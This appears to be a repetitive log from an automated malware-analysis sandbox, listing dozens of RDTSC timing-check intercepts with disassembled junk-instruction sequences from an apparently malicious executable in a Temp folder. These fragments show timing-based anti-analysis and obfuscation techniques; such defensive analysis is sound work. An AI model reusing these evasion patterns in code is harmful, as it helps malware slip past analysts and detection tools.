                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3795D1 second address: 379603 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4785B0BF48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1CEEh], edi 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A30h] 0x00000019 push 53538579h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F4785B0BF4Dh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379603 second address: 379608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379608 second address: 379621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4785B0BF55h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379777 second address: 37977B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37977B second address: 37977F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379857 second address: 37989E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 6AB32CE5h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4784F102C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 lea ebx, dword ptr [ebp+1246A229h] 0x0000002c mov cl, C0h 0x0000002e xchg eax, ebx 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F4784F102D2h 0x00000037 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37989E second address: 3798BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 362DC6 second address: 362DE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F4784F102C6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CCh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3989C5 second address: 3989CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398B0A second address: 398B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398B0E second address: 398B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398B12 second address: 398B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398C8C second address: 398CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4785B0BF53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4785B0BF4Ah 0x00000011 push ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ebx 0x00000015 push ebx 0x00000016 jg 00007F4785B0BF46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398CBC second address: 398CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398CC8 second address: 398CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398CCC second address: 398CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398CD2 second address: 398CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4785B0BF4Dh 0x00000009 jmp 00007F4785B0BF4Dh 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398FA6 second address: 398FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398FAC second address: 398FE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 jmp 00007F4785B0BF56h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4785B0BF4Ah 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 398FE9 second address: 399010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4784F102CAh 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 399010 second address: 399032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3991BF second address: 3991DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3991DE second address: 3991F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF56h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3991F8 second address: 3991FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3991FC second address: 399202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39936E second address: 399393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D7h 0x00000007 jg 00007F4784F102C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 399393 second address: 399397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 399397 second address: 3993BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D9h 0x00000007 jp 00007F4784F102C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3997F4 second address: 3997FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4785B0BF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 371EA0 second address: 371EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 371EA5 second address: 371EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4785B0BF50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 399919 second address: 39991E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39A30D second address: 39A32D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4785B0BF54h 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39A32D second address: 39A331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39A5B0 second address: 39A5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4785B0BF4Bh 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39DB96 second address: 39DB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39DB9C second address: 39DBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39C9A1 second address: 39C9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39C9A5 second address: 39C9DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4785B0BF57h 0x0000000e popad 0x0000000f push eax 0x00000010 jng 00007F4785B0BF54h 0x00000016 pushad 0x00000017 jg 00007F4785B0BF46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39D0F6 second address: 39D0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39D0FC second address: 39D109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39E256 second address: 39E25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4AE second address: 39F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4BE second address: 39F4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4784F102D4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4DA second address: 39F4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4E0 second address: 39F4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4E9 second address: 39F4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4ED second address: 39F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F50F second address: 39F515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F515 second address: 39F533 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4784F102C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jno 00007F4784F102C6h 0x00000015 pop edx 0x00000016 jnp 00007F4784F102CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A289D second address: 3A28A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A28A9 second address: 3A28D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4784F102CAh 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4784F102D2h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A28D5 second address: 3A28DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 35C36C second address: 35C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64CD second address: 3A64D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64D5 second address: 3A64D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64D9 second address: 3A64F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A668D second address: 3A66A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4784F102CEh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A6C5A second address: 3A6C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA263 second address: 3AA268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA268 second address: 3AA26D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA26D second address: 3AA2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4784F102CDh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jnp 00007F4784F102D0h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F4784F102D2h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA3DC second address: 3AA3E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4785B0BF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA82A second address: 3AA830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA930 second address: 3AA938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA938 second address: 3AA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA93C second address: 3AA958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4785B0BF52h 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AAF41 second address: 3AAF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0BA second address: 3AB0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0BE second address: 3AB0C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0C4 second address: 3AB0C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0C9 second address: 3AB0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CBh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2A6 second address: 3AB2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2AA second address: 3AB2CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4784F102D4h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2CC second address: 3AB2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2D1 second address: 3AB2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB376 second address: 3AB38E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB38E second address: 3AB3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007F4784F102D5h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB3B4 second address: 3AB3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
